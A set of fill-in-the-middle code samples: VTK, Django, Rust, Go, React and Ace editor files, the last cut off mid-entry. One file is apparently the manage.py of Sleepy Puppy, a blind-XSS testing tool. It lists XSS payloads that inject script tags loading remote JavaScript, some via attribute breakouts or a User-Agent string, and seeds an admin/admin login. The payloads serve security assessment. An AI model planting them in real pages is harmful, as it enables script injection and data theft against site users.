aPolyLineActor.GetProperty().BackfaceCullingOn() # Vertex vertexPoints = vtk.vtkPoints() vertexPoints.SetNumberOfPoints(1) vertexPoints.InsertPoint(0,0,0,0) aVertex = vtk.vtkVertex() aVertex.GetPointIds().SetId(0,0) aVertexGrid = vtk.vtkUnstructuredGrid() aVertexGrid.Allocate(1,1) aVertexGrid.InsertNextCell(aVertex.GetCellType(),aVertex.GetPointIds()) aVertexGrid.SetPoints(vertexPoints) aVertexMapper = vtk.vtkDataSetMapper() aVertexMapper.SetInputData(aVertexGrid) aVertexActor = vtk.vtkActor() aVertexActor.SetMapper(aVertexMapper) aVertexActor.AddPosition(0,0,6) aVertexActor.GetProperty().BackfaceCullingOn() # Poly Vertex polyVertexPoints = vtk.vtkPoints() polyVertexPoints.SetNumberOfPoints(3) polyVertexPoints.InsertPoint(0,0,0,0) polyVertexPoints.InsertPoint(1,1,0,0) polyVertexPoints.InsertPoint(2,1,1,0) aPolyVertex = vtk.vtkPolyVertex() aPolyVertex.GetPointIds().SetNumberOfIds(3) aPolyVertex.GetPointIds().SetId(0,0) aPolyVertex.GetPointIds().SetId(1,1) aPolyVertex.GetPointIds().SetId(2,2) aPolyVertexGrid = vtk.vtkUnstructuredGrid() aPolyVertexGrid.Allocate(1,1) aPolyVertexGrid.InsertNextCell(aPolyVertex.GetCellType(),aPolyVertex.GetPointIds()) aPolyVertexGrid.SetPoints(polyVertexPoints) aPolyVertexMapper = vtk.vtkDataSetMapper() aPolyVertexMapper.SetInputData(aPolyVertexGrid) aPolyVertexActor = vtk.vtkActor() aPolyVertexActor.SetMapper(aPolyVertexMapper) aPolyVertexActor.AddPosition(2,0,6) aPolyVertexActor.GetProperty().BackfaceCullingOn() # Pentagonal prism pentaPoints = vtk.vtkPoints() pentaPoints.SetNumberOfPoints(10) pentaPoints.InsertPoint(0,0.25,0.0,0.0) pentaPoints.InsertPoint(1,0.75,0.0,0.0) pentaPoints.InsertPoint(2,1.0,0.5,0.0) pentaPoints.InsertPoint(3,0.5,1.0,0.0) pentaPoints.InsertPoint(4,0.0,0.5,0.0) pentaPoints.InsertPoint(5,0.25,0.0,1.0) pentaPoints.InsertPoint(6,0.75,0.0,1.0) pentaPoints.InsertPoint(7,1.0,0.5,1.0) pentaPoints.InsertPoint(8,0.5,1.0,1.0) pentaPoints.InsertPoint(9,0.0,0.5,1.0) aPenta = vtk.vtkPentagonalPrism() aPenta.GetPointIds().SetId(0,0) aPenta.GetPointIds().SetId(1,1) aPenta.GetPointIds().SetId(2,2) aPenta.GetPointIds().SetId(3,3) aPenta.GetPointIds().SetId(4,4) aPenta.GetPointIds().SetId(5,5) aPenta.GetPointIds().SetId(6,6) aPenta.GetPointIds().SetId(7,7) aPenta.GetPointIds().SetId(8,8) aPenta.GetPointIds().SetId(9,9) aPentaGrid = vtk.vtkUnstructuredGrid() aPentaGrid.Allocate(1,1) aPentaGrid.InsertNextCell(aPenta.GetCellType(),aPenta.GetPointIds()) aPentaGrid.SetPoints(pentaPoints) aPentaMapper = vtk.vtkDataSetMapper() aPentaMapper.SetInputData(aPentaGrid) aPentaActor = vtk.vtkActor() aPentaActor.SetMapper(aPentaMapper) aPentaActor.AddPosition(10,0,0) aPentaActor.GetProperty().BackfaceCullingOn() # Hexagonal prism hexaPoints = vtk.vtkPoints() hexaPoints.SetNumberOfPoints(12) hexaPoints.InsertPoint(0,0.0,0.0,0.0) hexaPoints.InsertPoint(1,0.5,0.0,0.0) hexaPoints.InsertPoint(2,1.0,0.5,0.0) hexaPoints.InsertPoint(3,1.0,1.0,0.0) hexaPoints.InsertPoint(4,0.5,1.0,0.0) hexaPoints.InsertPoint(5,0.0,0.5,0.0) hexaPoints.InsertPoint(6,0.0,0.0,1.0) hexaPoints.InsertPoint(7,0.5,0.0,1.0) hexaPoints.InsertPoint(8,1.0,0.5,1.0) hexaPoints.InsertPoint(9,1.0,1.0,1.0) hexaPoints.InsertPoint(10,0.5,1.0,1.0) hexaPoints.InsertPoint(11,0.0,0.5,1.0) aHexa = vtk.vtkHexagonalPrism() aHexa.GetPointIds().SetId(0,0) aHexa.GetPointIds().SetId(1,1) aHexa.GetPointIds().SetId(2,2) aHexa.GetPointIds().SetId(3,3) aHexa.GetPointIds().SetId(4,4) aHexa.GetPointIds().SetId(5,5) aHexa.GetPointIds().SetId(6,6) aHexa.GetPointIds().SetId(7,7) aHexa.GetPointIds().SetId(8,8) aHexa.GetPointIds().SetId(9,9) aHexa.GetPointIds().SetId(10,10) aHexa.GetPointIds().SetId(11,11) aHexaGrid = vtk.vtkUnstructuredGrid() aHexaGrid.Allocate(1,1) aHexaGrid.InsertNextCell(aHexa.GetCellType(),aHexa.GetPointIds()) aHexaGrid.SetPoints(hexaPoints) aHexaMapper = vtk.vtkDataSetMapper() aHexaMapper.SetInputData(aHexaGrid) aHexaActor = vtk.vtkActor() aHexaActor.SetMapper(aHexaMapper) aHexaActor.AddPosition(12,0,0) aHexaActor.GetProperty().BackfaceCullingOn() ren1.SetBackground(.1,.2,.4) ren1.AddActor(aVoxelActor) aVoxelActor.GetProperty().SetDiffuseColor(1,0,0) ren1.AddActor(aHexahedronActor) aHexahedronActor.GetProperty().SetDiffuseColor(1,1,0) ren1.AddActor(aTetraActor)<|fim▁hole|>ren1.AddActor(aWedgeActor) aWedgeActor.GetProperty().SetDiffuseColor(0,1,1) ren1.AddActor(aPyramidActor) aPyramidActor.GetProperty().SetDiffuseColor(1,0,1) ren1.AddActor(aPixelActor) aPixelActor.GetProperty().SetDiffuseColor(0,1,1) ren1.AddActor(aQuadActor) aQuadActor.GetProperty().SetDiffuseColor(1,0,1) ren1.AddActor(aTriangleActor) aTriangleActor.GetProperty().SetDiffuseColor(.3,1,.5) ren1.AddActor(aPolygonActor) aPolygonActor.GetProperty().SetDiffuseColor(1,.4,.5) ren1.AddActor(aTriangleStripActor) aTriangleStripActor.GetProperty().SetDiffuseColor(.3,.7,1) ren1.AddActor(aLineActor) aLineActor.GetProperty().SetDiffuseColor(.2,1,1) ren1.AddActor(aPolyLineActor) aPolyLineActor.GetProperty().SetDiffuseColor(1,1,1) ren1.AddActor(aVertexActor) aVertexActor.GetProperty().SetDiffuseColor(1,1,1) ren1.AddActor(aPolyVertexActor) aPolyVertexActor.GetProperty().SetDiffuseColor(1,1,1) ren1.AddActor(aPentaActor) aPentaActor.GetProperty().SetDiffuseColor(.2,.4,.7) ren1.AddActor(aHexaActor) aHexaActor.GetProperty().SetDiffuseColor(.7,.5,1) ren1.ResetCamera() ren1.GetActiveCamera().Azimuth(30) ren1.GetActiveCamera().Elevation(20) ren1.GetActiveCamera().Dolly(1.25) ren1.ResetCameraClippingRange() renWin.Render() cellPicker = vtk.vtkCellPicker() pointPicker = vtk.vtkPointPicker() worldPicker = vtk.vtkWorldPointPicker() cellCount = 0 pointCount = 0 ren1.IsInViewport(0,0) x = 0 while x <= 265: y = 100 while y <= 200: cellPicker.Pick(x,y,0,ren1) pointPicker.Pick(x,y,0,ren1) worldPicker.Pick(x,y,0,ren1) if (cellPicker.GetCellId() != "-1"): cellCount = cellCount + 1 pass if (pointPicker.GetPointId() != "-1"): pointCount = pointCount + 1 pass y = y + 6 x = x + 6 # render the image # iren.Initialize() # --- end of script --<|fim▁end|>
aTetraActor.GetProperty().SetDiffuseColor(0,1,0)
<|file_name|>settings.py<|end_file_name|><|fim▁begin|>""" Django settings for djangoApp project. Generated by 'django-admin startproject' using Django 1.10.5. For more information on this file, see https://docs.djangoproject.com/en/1.10/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.10/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = 'r&j)3lay4i$rm44n%h)bsv_q(9ysqhl@7@aibjm2b=1)0fag9n' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'djangoApp.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'djangoApp.wsgi.application' # Database # https://docs.djangoproject.com/en/1.10/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.10/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True <|fim▁hole|># https://docs.djangoproject.com/en/1.10/howto/static-files/ STATIC_URL = '/static/'<|fim▁end|>
USE_TZ = True # Static files (CSS, JavaScript, Images)
<|file_name|>manage.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python # Copyright 2015 Netflix, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import getpass import os from flask_script.commands import ShowUrls, Clean from flask.ext.script import Manager from flask.ext.migrate import Migrate, MigrateCommand from sleepypuppy.admin.admin.models import Administrator from sleepypuppy import app, db from js_strings import default_script, alert_box, console_log, default_without_screenshot, generic_collector manager = Manager(app) migrate = Migrate(app, db) manager.add_command('db', MigrateCommand) @manager.shell def make_shell_context(): """ Creates a python REPL with several default imports in the context of the app """ return dict(app=app) @manager.command def create_db(): """ Creates a database with all of the tables defined in your Alchemy models """ db.create_all() @manager.command def drop_db(): """ Drops a database with all of the tables defined in your Alchemy models """ db.drop_all() @manager.command def create_login(login): """ Seed the database with an admin user. """ print 'creating admin user' if Administrator.query.filter_by(login=login).count(): print 'user already exists!' return # Check env for credentials (used by docker) docker_admin_pass = os.getenv('DOCKER_ADMIN_PASS', None) if docker_admin_pass: admin_user = Administrator(login=login, password=docker_admin_pass) else: # else, ask on stdin: while True: print "{}, enter your password!\n ".format(login) pw1 = getpass.getpass() pw2 = getpass.getpass(prompt="Confirm: ") if pw1 == pw2: admin_user = Administrator(login=login, password=pw1) break else: print 'passwords do not match!' db.session.add(admin_user) db.session.commit() print 'user: ' + login + ' created!' @manager.command def default_login():<|fim▁hole|> existing_admin = Administrator.query.filter( Administrator.login == 'admin').first() if existing_admin: print "Admin account (admin) already exists, skipping." else: admin_user = Administrator(login='admin', password='admin') print 'user: ' + 'admin' + ' created!' db.session.add(admin_user) db.session.commit() return from collections import namedtuple DefaultPayload = namedtuple( 'DefaultPayload', ['payload', 'notes', 'snooze', 'run_once']) DEFAULT_PAYLOADS = [ DefaultPayload('<script src=$1></script>', None, False, False), DefaultPayload('</script><script src=$1>', None, False, False), DefaultPayload( '&lt;script src=$1&gt;&lt;/script&gt;', None, False, False), DefaultPayload('&lt;/script&gt;&lt;script src=$1&gt;', None, False, False), DefaultPayload('''" onload="var s=document.createElement('script');s.src='$1';document.getElementsByTagName('head')[0].appendChild(s);" garbage="''', None, False, False), # noqa DefaultPayload("""'"><img src=x onerror="var s=document.createElement('script');s.src='$1';document.getElementsByTagName('head')[0].appendChild(s);">""", None, False, False), # noqa DefaultPayload("""Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 '"><img src=x onerror="var s=document.createElement('script');s.src='$1';document.getElementsByTagName('head')[0].appendChild(s);">""", None, False, False) # noqa ] DefaultPuppyscript = namedtuple('DefaultPuppyscript', ['name', 'code', 'notes']) DEFAULT_JAVASCRIPTS = [ DefaultPuppyscript('Default', default_script, 'Default collects metadata for capture table including a screenshot'), DefaultPuppyscript('Default Without Screenshot', default_without_screenshot, 'Generating a screenshot can be CPU intensive and even in some cases cause browser instability, so for some assessments this may be a better option. '), DefaultPuppyscript( 'Alert Box', alert_box, 'Generates an alert box for notification purposes'), DefaultPuppyscript( 'Console Log', console_log, 'Log a message in the browser\'s console'), DefaultPuppyscript('Generic Collector: IP Address', generic_collector, 'Example showing how you can create generic JavaScripts for collecting any text data you choose. In this example we use ajax to determine IP address and record the value. ') ] @manager.command def create_bootstrap_assessment(name="General", add_default_payloads=True): """ Creates an assessment and attaches a few default payloads. """ from sleepypuppy.admin.assessment.models import Assessment from sleepypuppy.admin.payload.models import Payload from sleepypuppy.admin.puppyscript.models import Puppyscript assessment = Assessment.query.filter(Assessment.name == name).first() if assessment: print("Assessment with name", name, "already exists, exiting.") return else: assessment = Assessment( name=name, access_log_enabled=False, snooze=False, run_once=False) # add assessment db.session.add(assessment) db.session.commit() existing_payload = Payload.query.filter(Payload.id == 1).first() if existing_payload: print("Payloads already exists, exiting.") else: if add_default_payloads: for payload in DEFAULT_PAYLOADS: payload = Payload( payload=payload.payload, notes=payload.notes, ordering=u'1' ) db.session.add(payload) db.session.commit() existing_puppyscript = Puppyscript.query.filter(Puppyscript.id == 1).first() if existing_puppyscript: print("Puppyscripts already exists, exiting.") else: for puppyscript in DEFAULT_JAVASCRIPTS: puppyscript = Puppyscript( name=puppyscript.name, code=puppyscript.code, notes=puppyscript.notes ) db.session.add(puppyscript) db.session.commit() @manager.command def setup_sleepy_puppy(): create_db() create_bootstrap_assessment() create_login('admin') @manager.command def list_routes(): func_list = {} for rule in app.url_map.iter_rules(): if rule.endpoint != 'static': func_list[rule.rule] = app.view_functions[rule.endpoint].__doc__ from pprint import pprint pprint(func_list) if __name__ == "__main__": manager.add_command("clean", Clean()) manager.add_command("show_urls", ShowUrls()) manager.run()<|fim▁end|>
""" Seed the database with some inital values """
<|file_name|>fileops.rs<|end_file_name|><|fim▁begin|>//! Contains operations related to the /dev/ipath character files.<|fim▁hole|>use std::ffi::CString; use libc::c_int; use std::os::unix::io::{RawFd, AsRawFd}; use std::ops::Drop; use std::io::Error; pub struct Fd(RawFd); impl Fd { pub fn open<T: Into<String>>(path: T, mode: c_int) -> Result<Fd, Error> { let fd = unsafe { libc::open(CString::new(path.into()) .unwrap_or(CString::new("").unwrap()).as_ptr(), mode) }; match fd { -1 => Err(Error::last_os_error()), _ => Ok(Fd(fd)) } } fn close(&self) -> c_int { unsafe { libc::close(self.0) } } // With F_SETFD we only care if fcntl failed pub fn try_set_flag(&self, flag: c_int ) -> Result<c_int, Error> { match unsafe { libc::fcntl(self.0, libc::F_SETFD, flag) } { -1 => Err(Error::last_os_error()), ret @ _ => Ok(ret) } } } impl AsRawFd for Fd { fn as_raw_fd(&self) -> RawFd { self.0 } } impl Drop for Fd { // XXX: Do we need to check result of close? fn drop(&mut self) { if self.0 != -1 { self.close(); } } } #[test] // Check open/close on a file that should exist in most linux based OS. fn open_close_devnull() { use std::error::Error as std_error; match Fd::open("/dev/null", libc::O_RDONLY) { Err(e) => panic!(e.description().to_owned()), _ => () } }<|fim▁end|>
extern crate libc;
<|file_name|>test.go<|end_file_name|><|fim▁begin|>package main import ( "log" "time" "dwmb/comm" "dwmb/display" "dwmb/request" "dwmb/rfid" "dwmb/sound" ) func quickMessage(messages chan<- *comm.DisplayMessage, text string) { messages <- &comm.DisplayMessage{Message: text} } func processResponse(messages chan<- *comm.DisplayMessage, messageTimer *time.Timer, resp *request.Response) { log.Printf("got response: %v\n", resp) message := &comm.DisplayMessage{} if resp.Message != "" && resp.Message != "ok" { text, timeout := display.MakeMessage(resp) messageTimer.Reset(timeout * time.Second) message.Message = text } for i, slot := range resp.Slots { switch slot { case request.Free: message.Lights[i] = comm.Green case request.Occupied: message.Lights[i] = comm.Yellow case request.Alarm: message.Lights[i] = comm.Red default: message.Lights[i] = comm.Off } } messages <- message return } func main() { states, messages, err := comm.Init("/dev/ttyAMA0", 115200) if err != nil { log.Fatal(err) } tags, err := rfid.Init("/tmp/poop") if err != nil { log.Fatal(err) } server := request.NewServer("http://do:1234", "6x9=42") state := &comm.State{Message: ""} tag := &rfid.Tag{}<|fim▁hole|> messages <- &comm.DisplayMessage{Message: "hi!"} messageTimer := time.NewTimer(3 * time.Second) go func() { for { <-messageTimer.C messages <- &comm.DisplayMessage{Message: "\a"} } }() for { select { case state = <-states: state.Snapshot = "/tmp/cam1/lastsnap.jpg" resp, err := server.SendState(state) if err != nil { log.Print(err) } else { if resp.Message == "theft" { sound.Play("alarm", true) } else { sound.Stop() } processResponse(messages, messageTimer, resp) } case tag = <-tags: resp, err := server.SendTag(tag) if err != nil { quickMessage(messages, "error :(") log.Print(err) } else { sound.Play("poop", false) processResponse(messages, messageTimer, resp) } } } }<|fim▁end|>
sound := sound.NewSound("./sounds")
<|file_name|>ClientListComponent.js<|end_file_name|><|fim▁begin|>import React from 'react'; import _ from 'lodash'; import moment from 'moment'; import ClientListFilterComponent from './ClientListFilterComponent'; import ClientListItemComponent from './ClientListItemComponent'; <|fim▁hole|>class ClientListComponent extends React.Component { constructor() { super(); this.state = { orderByDate: true, gridView: false } } setGridView(boolean) { this.setState({ gridView: boolean }) } setSortedByDateState(boolean) { this.setState({ orderByDate: boolean }) } chooseOrderByType() { return this.state.orderByDate ? this.orderByDate() : this.orderByAlphabet(); } orderByAlphabet() { return _.orderBy(this.props.clientlist, 'clientName', 'asc'); } orderByDate() { return _.orderBy(this.props.clientlist, 'submitDate', 'desc'); } render() { return ( <div> <ClientListFilterComponent gridView={this.state.gridView} changeToGridView={boolean => this.setGridView(boolean)} orderByDate={this.state.orderByDate} handleClick={boolean => this.setSortedByDateState(boolean)} /> <ul className={this.state.gridView ? "clientlist__list grid" : "clientlist__list"}> { this.chooseOrderByType().map(client => ( <ClientListItemComponent gridView={this.state.gridView} key={client.token} getRequest={client => this.props.getRequest(client)} client={client}/> ))} </ul> </div> ) } }; export default ClientListComponent;<|fim▁end|>
<|file_name|>singlebyte.rs<|end_file_name|><|fim▁begin|>// This is a part of rust-encoding. // Copyright (c) 2013-2015, Kang Seonghoon. // See README.md and LICENSE.txt for details. //! Common codec implementation for single-byte encodings. use libtww::std::convert::Into; use util::{as_char, StrCharIndex}; use types::*; /// A common framework for single-byte encodings based on ASCII. #[derive(Copy, Clone)] pub struct SingleByteEncoding { pub name: &'static str, pub whatwg_name: Option<&'static str>, pub index_forward: fn(u8) -> u16, pub index_backward: fn(u32) -> u8, } impl Encoding for SingleByteEncoding { fn name(&self) -> &'static str { self.name } fn whatwg_name(&self) -> Option<&'static str> { self.whatwg_name } fn raw_encoder(&self) -> Box<RawEncoder> { SingleByteEncoder::new(self.index_backward) } fn raw_decoder(&self) -> Box<RawDecoder> { SingleByteDecoder::new(self.index_forward) } } /// An encoder for single-byte encodings based on ASCII. #[derive(Clone, Copy)] pub struct SingleByteEncoder { index_backward: fn(u32) -> u8, } impl SingleByteEncoder { pub fn new(index_backward: fn(u32) -> u8) -> Box<RawEncoder> { Box::new(SingleByteEncoder { index_backward: index_backward }) } } impl RawEncoder for SingleByteEncoder { fn from_self(&self) -> Box<RawEncoder> { SingleByteEncoder::new(self.index_backward) } fn is_ascii_compatible(&self) -> bool { true } fn raw_feed(&mut self, input: &str, output: &mut ByteWriter) -> (usize, Option<CodecError>) { output.writer_hint(input.len()); for ((i, j), ch) in input.index_iter() { if ch <= '\u{7f}' { output.write_byte(ch as u8); continue; } else { let index = (self.index_backward)(ch as u32); if index != 0 { output.write_byte(index); } else { return (i, Some(CodecError { upto: j as isize, cause: "unrepresentable character".into(), })); } } } (input.len(), None) } fn raw_finish(&mut self, _output: &mut ByteWriter) -> Option<CodecError> { None } } /// A decoder for single-byte encodings based on ASCII. #[derive(Clone, Copy)] pub struct SingleByteDecoder { index_forward: fn(u8) -> u16, } impl SingleByteDecoder {<|fim▁hole|> pub fn new(index_forward: fn(u8) -> u16) -> Box<RawDecoder> { Box::new(SingleByteDecoder { index_forward: index_forward }) } } impl RawDecoder for SingleByteDecoder { fn from_self(&self) -> Box<RawDecoder> { SingleByteDecoder::new(self.index_forward) } fn is_ascii_compatible(&self) -> bool { true } fn raw_feed(&mut self, input: &[u8], output: &mut StringWriter) -> (usize, Option<CodecError>) { output.writer_hint(input.len()); let mut i = 0; let len = input.len(); while i < len { if input[i] <= 0x7f { output.write_char(input[i] as char); } else { let ch = (self.index_forward)(input[i]); if ch != 0xffff { output.write_char(as_char(ch as u32)); } else { return (i, Some(CodecError { upto: i as isize + 1, cause: "invalid sequence".into(), })); } } i += 1; } (i, None) } fn raw_finish(&mut self, _output: &mut StringWriter) -> Option<CodecError> { None } } /// Algorithmic mapping for ISO 8859-1. pub mod iso_8859_1 { #[inline] pub fn forward(code: u8) -> u16 { code as u16 } #[inline] pub fn backward(code: u32) -> u8 { if (code & !0x7f) == 0x80 { code as u8 } else { 0 } } } #[cfg(test)] mod tests { use all::ISO_8859_2; use types::*; #[test] fn test_encoder_non_bmp() { let mut e = ISO_8859_2.raw_encoder(); assert_feed_err!(e, "A", "\u{FFFF}", "B", [0x41]); assert_feed_err!(e, "A", "\u{10000}", "B", [0x41]); } }<|fim▁end|>
<|file_name|>main.js<|end_file_name|><|fim▁begin|>import qambi, { getMIDIInputs } from 'qambi' document.addEventListener('DOMContentLoaded', function(){ console.time('loading and parsing assets took') qambi.init({ song: { type: 'Song', url: '../data/minute_waltz.mid' }, piano: { type: 'Instrument', url: '../../instruments/heartbeat/city-piano-light-concat.json' } }) .then(main) }) function main(data){ console.timeEnd('loading and parsing assets took') let {song, piano} = data song.getTracks().forEach(track => { track.setInstrument(piano)<|fim▁hole|> track.connectMIDIInputs(...getMIDIInputs()) }) let btnPlay = document.getElementById('play') let btnPause = document.getElementById('pause') let btnStop = document.getElementById('stop') let divLoading = document.getElementById('loading') divLoading.innerHTML = '' btnPlay.disabled = false btnPause.disabled = false btnStop.disabled = false btnPlay.addEventListener('click', function(){ song.play() }) btnPause.addEventListener('click', function(){ song.pause() }) btnStop.addEventListener('click', function(){ song.stop() }) }<|fim▁end|>
track.monitor = true
<|file_name|>keybinding-vscode.js<|end_file_name|><|fim▁begin|>ace.define("ace/keyboard/vscode",[], function(require, exports, module) { "use strict"; var HashHandler = require("../keyboard/hash_handler").HashHandler; var config = require("../config"); exports.handler = new HashHandler(); exports.handler.$id = "ace/keyboard/vscode"; exports.handler.addCommands([{ name: "toggleWordWrap", exec: function(editor) { var wrapUsed = editor.session.getUseWrapMode(); editor.session.setUseWrapMode(!wrapUsed); }, readOnly: true }, { name: "navigateToLastEditLocation", exec: function(editor) { var lastDelta = editor.session.getUndoManager().$lastDelta; var range = (lastDelta.action == "remove")? lastDelta.start: lastDelta.end; editor.moveCursorTo(range.row, range.column); editor.clearSelection(); } }, { name: "replaceAll", exec: function (editor) { if (!editor.searchBox) { config.loadModule("ace/ext/searchbox", function(e) { e.Search(editor, true); }); } else { if (editor.searchBox.active === true && editor.searchBox.replaceOption.checked === true) { editor.searchBox.replaceAll(); } } } }, { name: "replaceOne", exec: function (editor) { if (!editor.searchBox) { config.loadModule("ace/ext/searchbox", function(e) { e.Search(editor, true); }); } else { if (editor.searchBox.active === true && editor.searchBox.replaceOption.checked === true) { editor.searchBox.replace(); } } } }, { name: "selectAllMatches", exec: function (editor) { if (!editor.searchBox) { config.loadModule("ace/ext/searchbox", function(e) { e.Search(editor, false); }); } else { if (editor.searchBox.active === true) { editor.searchBox.findAll(); } } } }, { name: "toggleFindCaseSensitive", exec: function (editor) { config.loadModule("ace/ext/searchbox", function(e) { e.Search(editor, false); var sb = editor.searchBox; sb.caseSensitiveOption.checked = !sb.caseSensitiveOption.checked; sb.$syncOptions(); }); } }, { name: "toggleFindInSelection", exec: function (editor) { config.loadModule("ace/ext/searchbox", function(e) { e.Search(editor, false); var sb = editor.searchBox; sb.searchOption.checked = !sb.searchRange; sb.setSearchRange(sb.searchOption.checked && sb.editor.getSelectionRange()); sb.$syncOptions(); }); } }, { name: "toggleFindRegex", exec: function (editor) { config.loadModule("ace/ext/searchbox", function(e) { e.Search(editor, false); var sb = editor.searchBox; sb.regExpOption.checked = !sb.regExpOption.checked; sb.$syncOptions(); }); } }, { name: "toggleFindWholeWord", exec: function (editor) { config.loadModule("ace/ext/searchbox", function(e) { e.Search(editor, false); var sb = editor.searchBox; sb.wholeWordOption.checked = !sb.wholeWordOption.checked; sb.$syncOptions(); }); } }, { name: "removeSecondaryCursors", exec: function (editor) { var ranges = editor.selection.ranges; if (ranges && ranges.length > 1) editor.selection.toSingleRange(ranges[ranges.length - 1]); else editor.selection.clearSelection(); } }]); [{ bindKey: {mac: "Ctrl-G", win: "Ctrl-G"}, name: "gotoline" }, { bindKey: {mac: "Command-Shift-L|Command-F2", win: "Ctrl-Shift-L|Ctrl-F2"}, name: "findAll"<|fim▁hole|> name: "goToPreviousError" }, { bindKey: {mac: "F8|Option-F8", win: "F8|Alt-F8"}, name: "goToNextError" }, { bindKey: {mac: "Command-Shift-P|F1", win: "Ctrl-Shift-P|F1"}, name: "openCommandPallete" }, { bindKey: {mac: "Command-K|Command-S", win: "Ctrl-K|Ctrl-S"}, name: "showKeyboardShortcuts" }, { bindKey: {mac: "Shift-Option-Up", win: "Alt-Shift-Up"}, name: "copylinesup" }, { bindKey: {mac: "Shift-Option-Down", win: "Alt-Shift-Down"}, name: "copylinesdown" }, { bindKey: {mac: "Command-Shift-K", win: "Ctrl-Shift-K"}, name: "removeline" }, { bindKey: {mac: "Command-Enter", win: "Ctrl-Enter"}, name: "addLineAfter" }, { bindKey: {mac: "Command-Shift-Enter", win: "Ctrl-Shift-Enter"}, name: "addLineBefore" }, { bindKey: {mac: "Command-Shift-\\", win: "Ctrl-Shift-\\"}, name: "jumptomatching" }, { bindKey: {mac: "Command-]", win: "Ctrl-]"}, name: "blockindent" }, { bindKey: {mac: "Command-[", win: "Ctrl-["}, name: "blockoutdent" }, { bindKey: {mac: "Ctrl-PageDown", win: "Alt-PageDown"}, name: "pagedown" }, { bindKey: {mac: "Ctrl-PageUp", win: "Alt-PageUp"}, name: "pageup" }, { bindKey: {mac: "Shift-Option-A", win: "Shift-Alt-A"}, name: "toggleBlockComment" }, { bindKey: {mac: "Option-Z", win: "Alt-Z"}, name: "toggleWordWrap" }, { bindKey: {mac: "Command-G", win: "F3|Ctrl-K Ctrl-D"}, name: "findnext" }, { bindKey: {mac: "Command-Shift-G", win: "Shift-F3"}, name: "findprevious" }, { bindKey: {mac: "Option-Enter", win: "Alt-Enter"}, name: "selectAllMatches" }, { bindKey: {mac: "Command-D", win: "Ctrl-D"}, name: "selectMoreAfter" }, { bindKey: {mac: "Command-K Command-D", win: "Ctrl-K Ctrl-D"}, name: "selectOrFindNext" }, { bindKey: {mac: "Shift-Option-I", win: "Shift-Alt-I"}, name: "splitSelectionIntoLines" }, { bindKey: {mac: "Command-K M", win: "Ctrl-K M"}, name: "modeSelect" }, { bindKey: {mac: "Command-Option-[", win: "Ctrl-Shift-["}, name: "toggleFoldWidget" }, { bindKey: {mac: "Command-Option-]", win: "Ctrl-Shift-]"}, name: "toggleFoldWidget" }, { bindKey: {mac: "Command-K Command-0", win: "Ctrl-K Ctrl-0"}, name: "foldall" }, { bindKey: {mac: "Command-K Command-J", win: "Ctrl-K Ctrl-J"}, name: "unfoldall" }, { bindKey: { mac: "Command-K Command-1", win: "Ctrl-K Ctrl-1" }, name: "foldOther" }, { bindKey: { mac: "Command-K Command-Q", win: "Ctrl-K Ctrl-Q" }, name: "navigateToLastEditLocation" }, { bindKey: { mac: "Command-K Command-R|Command-K Command-S", win: "Ctrl-K Ctrl-R|Ctrl-K Ctrl-S" }, name: "showKeyboardShortcuts" }, { bindKey: { mac: "Command-K Command-X", win: "Ctrl-K Ctrl-X" }, name: "trimTrailingSpace" }, { bindKey: {mac: "Shift-Down|Command-Shift-Down", win: "Shift-Down|Ctrl-Shift-Down"}, name: "selectdown" }, { bindKey: {mac: "Shift-Up|Command-Shift-Up", win: "Shift-Up|Ctrl-Shift-Up"}, name: "selectup" }, { bindKey: {mac: "Command-Alt-Enter", win: "Ctrl-Alt-Enter"}, name: "replaceAll" }, { bindKey: {mac: "Command-Shift-1", win: "Ctrl-Shift-1"}, name: "replaceOne" }, { bindKey: {mac: "Option-C", win: "Alt-C"}, name: "toggleFindCaseSensitive" }, { bindKey: {mac: "Option-L", win: "Alt-L"}, name: "toggleFindInSelection" }, { bindKey: {mac: "Option-R", win: "Alt-R"}, name: "toggleFindRegex" }, { bindKey: {mac: "Option-W", win: "Alt-W"}, name: 